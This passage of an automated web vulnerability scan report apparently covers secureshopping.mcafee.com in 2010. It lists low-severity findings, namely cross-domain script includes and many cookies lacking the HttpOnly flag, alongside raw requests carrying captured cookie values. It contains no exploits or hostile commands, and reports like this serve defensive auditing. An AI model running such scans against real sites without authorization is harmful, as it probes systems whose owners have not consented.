__utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Date: Sat, 25 Dec 2010 03:53:16 GMT
Content-Length: 12044

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>Merchants - McAfee Secure Shopping</title>
<meta name="description"
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.171. http://secureshopping.mcafee.com/popular-searches previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/popular-searches

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /popular-searches HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:53:13 GMT
Content-Length: 48761

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>McAfee Secure Shopping</title>
<meta name="description" content="Your
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.172. http://secureshopping.mcafee.com/safeseat-step-1-baby-classics-car-seat-in-rittenhouse-1756125--pid-214267116 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/safeseat-step-1-baby-classics-car-seat-in-rittenhouse-1756125--pid-214267116

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /safeseat-step-1-baby-classics-car-seat-in-rittenhouse-1756125--pid-214267116 HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

3.173. http://secureshopping.mcafee.com/shop/holiday-cards previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/shop/holiday-cards

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /shop/holiday-cards HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:08 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:53:08 GMT
Content-Length: 58854

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>Holiday Cards at McAfee Secure Shopping - Search, Discover & Comp
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.174. http://secureshopping.mcafee.com/shop/holiday-gifts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/shop/holiday-gifts

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /shop/holiday-gifts HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:08 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:53:08 GMT
Content-Length: 62198

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>Holiday Gifts at McAfee Secure Shopping - Search, Discover & Comp
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

3.175. http://secureshopping.mcafee.com/shop/holiday-home-decor previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/shop/holiday-home-decor

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /shop/holiday-home-decor HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; langid=1; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AffID=0-0; Locale=EN-US; SessionInfo=AffiliateId=0&CampaignId=78228; CampaignId=78228; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; IS3_History=1292380167-1-10_3--1__3_; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; s_nr=1292705389773-Repeat; __utma=192341800.102881162.1293269981.1293269981.1293269981.1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; __utmc=192341800; __utmb=192341800.8.10.1293269981; user=id=1293248423528-1-dMZf; SiteID=1; Currency=56;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:07 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 25 Dec 2010 03:53:07 GMT
Content-Length: 64593

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>

<title>Holiday Home Decor at McAfee Secure Shopping - Search, Discover &
...[SNIP]...
</a>
<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"> </script>
...[SNIP]...

4. Cookie without HttpOnly flag set previous next
There are 225 instances of this issue:

/
/11-6-hard-shell-netbook-sleeve-magenta--pid-215156920
/11-6-molded-netbook-sleeve-notebook-sleeve--pid-215156776
/about.jsp
/browse/
/browse/baby/
/browse/baby/apparel/
/browse/baby/apparel/blankets/
/browse/baby/apparel/dresses-gowns/
/browse/baby/apparel/footwear/
/browse/baby/apparel/hats-caps/
/browse/baby/apparel/jackets/
/browse/baby/apparel/jumpsuits/
/browse/baby/apparel/layette/
/browse/baby/apparel/leggings-tights/
/browse/baby/apparel/pajamas/
/browse/baby/apparel/pants/
/browse/baby/apparel/shirts/
/browse/baby/apparel/sweaters/
/browse/baby/apparel/swimwear/
/browse/baby/bathing/
/browse/baby/bathing/bath-tubs/
/browse/baby/bathing/hooded-towels/
/browse/baby/bathing/lotion/
/browse/baby/bathing/potty-training/
/browse/baby/bathing/powder/
/browse/baby/bathing/shampoo/
/browse/baby/bathing/soap/
/browse/baby/bathing/washcloths/
/browse/baby/bedding/
/browse/baby/bedding/bedskirts/
/browse/baby/bedding/blankets/
/browse/baby/bedding/bumper-pads/
/browse/baby/bedding/comforters/
/browse/baby/bedding/crib-sets/
/browse/baby/bedding/hooded-towels/
/browse/baby/bedding/mattress-pads/
/browse/baby/bedding/sheets/
/browse/baby/bedding/washcloths/
/browse/baby/diapering/
/browse/baby/diapering/baby-wipes/
/browse/baby/diapering/diaper-bags/
/browse/baby/diapering/diaper-covers/
/browse/baby/diapering/diaper-storage-disposal/
/browse/baby/diapering/diapers/
/browse/baby/diapering/skin-care/
/browse/baby/feeding/
/browse/baby/feeding/baby-food-grinders/
/browse/baby/feeding/baby-food/
/browse/baby/feeding/bibs/
/browse/baby/feeding/bottles/
/browse/baby/feeding/breast-pumps/
/browse/baby/feeding/formula/
/browse/baby/feeding/milk-storage-bags/
/browse/baby/feeding/nipples/
/browse/baby/feeding/nursing-apparel/
/browse/baby/feeding/nursing-bras/
/browse/baby/feeding/nursing-pads/
/browse/baby/feeding/nursing-pillows/
/browse/baby/feeding/spoons-forks/
/browse/baby/furniture/
/browse/baby/furniture/bassinets/
/browse/baby/furniture/changing-tables/
/browse/baby/furniture/cribs/
/browse/baby/furniture/dressers/
/browse/baby/furniture/gliders-walkers/
/browse/baby/furniture/high-chairs/
/browse/baby/furniture/lamps-shades/
/browse/baby/furniture/mobiles/
/browse/baby/furniture/moses-baskets/
/browse/baby/furniture/night-lights/
/browse/baby/furniture/play-pens/
/browse/baby/furniture/rocking-chairs/
/browse/baby/furniture/swings-bouncers/
/browse/baby/furniture/toddler-bed/
/browse/baby/furniture/toy-chests/
/browse/baby/health/
/browse/baby/health/brushes-combs/
/browse/baby/health/diaper-rash-ointment/
/browse/baby/health/pacifiers/
/browse/baby/health/teethers/
/browse/baby/health/teething-relief/
/browse/baby/health/thermometers/
/browse/baby/health/toilet-training/
/browse/baby/safety/
/browse/baby/safety/baby-monitors/
/browse/baby/safety/bath-safety/
/browse/baby/safety/door-knob-covers/
/browse/baby/safety/drawer-cabinet-locks/
/browse/baby/safety/night-lights/
/browse/baby/safety/outlet-covers/
/browse/baby/safety/safety-gates/
/browse/baby/safety/safety-kits/
/browse/baby/toys/
/browse/baby/toys/activity-toys/
/browse/baby/toys/bath-toys/
/browse/baby/toys/learning-toys/
/browse/baby/toys/mobiles/
/browse/baby/toys/music-toys/
/browse/baby/toys/play-gyms-mats/
/browse/baby/toys/pull-along-toys/
/browse/baby/toys/rattles/
/browse/baby/toys/stuffed-toys/
/browse/baby/travel/
/browse/baby/travel/baby-carriers/
/browse/baby/travel/car-seats/
/browse/baby/travel/strollers/
/browse/clothing-accessories/
/browse/clothing-accessories/jewelry-watches/
/browse/collectibles-art/
/browse/computers/
/browse/computers/accessories/
/browse/computers/accessories/audio-video-accessories/
/browse/computers/accessories/bags,-cases-covers/
/browse/computers/accessories/batteries-chargers/
/browse/computers/accessories/camcorder-accessories/
/browse/computers/accessories/camera-accessories/
/browse/computers/accessories/camera-lenses/
/browse/computers/accessories/cell-phone-accessories/
/browse/computers/accessories/desktop-accessories/
/browse/computers/accessories/gps-accessories/
/browse/computers/accessories/headphones/
/browse/computers/accessories/microphones/
/browse/computers/accessories/monitor-accessories/
/browse/computers/accessories/mp3-player-accessories/
/browse/computers/accessories/notebook-pda-accessories/
/browse/computers/accessories/paper-supplies/
/browse/computers/accessories/printer-supplies/
/browse/computers/accessories/racks,-mounts-cabinets/
/browse/computers/accessories/remote-controls/
/browse/computers/accessories/scanner-accessories/
/browse/computers/accessories/storage-media/
/browse/computers/cables-adapters/
/browse/computers/cpu,-chassis-components/
/browse/computers/cpu,-chassis-components/cases/
/browse/computers/cpu,-chassis-components/cpu/
/browse/computers/cpu,-chassis-components/motherboards/
/browse/computers/desktops/
/browse/computers/graphics/
/browse/computers/handhelds-pda/
/browse/computers/input-devices/
/browse/computers/input-devices/joysticks-gamepads/
/browse/computers/input-devices/keyboards/
/browse/computers/input-devices/mice/
/browse/computers/monitors/
/browse/computers/network-communications/
/browse/computers/network-communications/adapters-interfaces/
/browse/computers/network-communications/bridges,-routers,-gateways/
/browse/computers/network-communications/modems/
/browse/computers/network-communications/network-hubs-switches/
/browse/computers/servers/terminals-thin-clients/
/browse/electronics/
/browse/electronics/digital-cameras/
/browse/food-wine/
/browse/health-beauty/
/browse/home-garden/
/browse/jewelry-watches/
/browse/magazines/
/browse/movies/
/browse/music/
/browse/office-products/
/browse/software/
/browse/sports-outdoors/
/browse/toys/
/browse/toys/cars,-trains-planes/
/browse/video-games/
/canon-eos-1d-3822b002-mark-iv-digital-slr-camera-body-only-16-1-megapixels--pid-214785577
/css/home.css
/css/product.css
/css/public.css
/css/search.css
/images/addto_google.gif
/images/addto_live.gif
/images/addto_myaol.gif
/images/addto_mymsn.gif
/images/addto_myyahoo.gif
/images/addto_netvibes.gif
/images/banner_arrow.gif
/images/banner_mfes_signup.gif
/images/banner_sa.gif
/images/banner_tp_081610.gif
/images/bgarea_690x250_cccccc.png
/images/btn_compare_down.gif
/images/btn_compare_up.gif
/images/btn_seeit_down.gif
/images/btn_seeit_up.gif
/images/btn_updatesearch_up.gif
/images/category_blank.png
/images/category_bottom.png
/images/category_top.png
/images/favicon.ico
/images/footer-search-bg.gif
/images/footer-search-left.gif
/images/footer-search-right.gif
/images/logo.gif
/images/nav-menu-bg.gif
/images/nav-menu-left.gif
/images/nav-menu-right.gif
/images/nav-menu-split.gif
/images/nav-menu-tab-bg.gif
/images/nav-menu-tab-left.gif
/images/nav-menu-tab-right.gif
/images/nav-search-bg.gif
/images/rss.gif
/images/star_half.png
/images/star_off.png
/images/star_on.png
/js/core.js
/js/expand-desc.js
/js/expand-links.js
/js/ga_init.js
/js/ga_track_click.js
/js/ga_track_click_init.js
/js/google_ads_0405616916.js
/js/google_ads_7017966687.js
/js/google_ads_7409232867.js
/js/mootools-1.2-core-nc.js
/legal.jsp
/link
/merchants-intro.jsp
/safeseat-step-1-baby-classics-car-seat-in-rittenhouse-1756125--pid-214267116
/shop
/shop/holiday-cards
/shop/holiday-gifts
/shop/holiday-home-decor

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

4.1. http://secureshopping.mcafee.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293247781225-3-y4N6; path=/; expires=Sun, 25-Dec-2011 03:29:40 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: secureshopping.mcafee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

4.2. http://secureshopping.mcafee.com/11-6-hard-shell-netbook-sleeve-magenta--pid-215156920 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/11-6-hard-shell-netbook-sleeve-magenta--pid-215156920

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:21 GMT
user=id=1293248423528-1-dMZf&ph=215156920; path=/; expires=Sun, 25-Dec-2011 03:53:21 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

4.3. http://secureshopping.mcafee.com/11-6-molded-netbook-sleeve-notebook-sleeve--pid-215156776 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/11-6-molded-netbook-sleeve-notebook-sleeve--pid-215156776

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:22 GMT
user=id=1293248423528-1-dMZf&ph=215156776; path=/; expires=Sun, 25-Dec-2011 03:53:22 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

4.4. http://secureshopping.mcafee.com/about.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/about.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:53:12 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.5. http://secureshopping.mcafee.com/browse/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:11 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.6. http://secureshopping.mcafee.com/browse/baby/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:42:13 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.7. http://secureshopping.mcafee.com/browse/baby/apparel/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:17 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.8. http://secureshopping.mcafee.com/browse/baby/apparel/blankets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/blankets/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:19 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.9. http://secureshopping.mcafee.com/browse/baby/apparel/dresses-gowns/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/dresses-gowns/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:20 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.10. http://secureshopping.mcafee.com/browse/baby/apparel/footwear/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/footwear/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:20 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.11. http://secureshopping.mcafee.com/browse/baby/apparel/hats-caps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/hats-caps/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:21 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.12. http://secureshopping.mcafee.com/browse/baby/apparel/jackets/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/jackets/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:23 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.13. http://secureshopping.mcafee.com/browse/baby/apparel/jumpsuits/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/jumpsuits/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:23 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.14. http://secureshopping.mcafee.com/browse/baby/apparel/layette/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/layette/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:50:25 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

4.15. http://secureshopping.mcafee.com/browse/baby/apparel/leggings-tights/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/browse/baby/apparel/leggings-tights/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

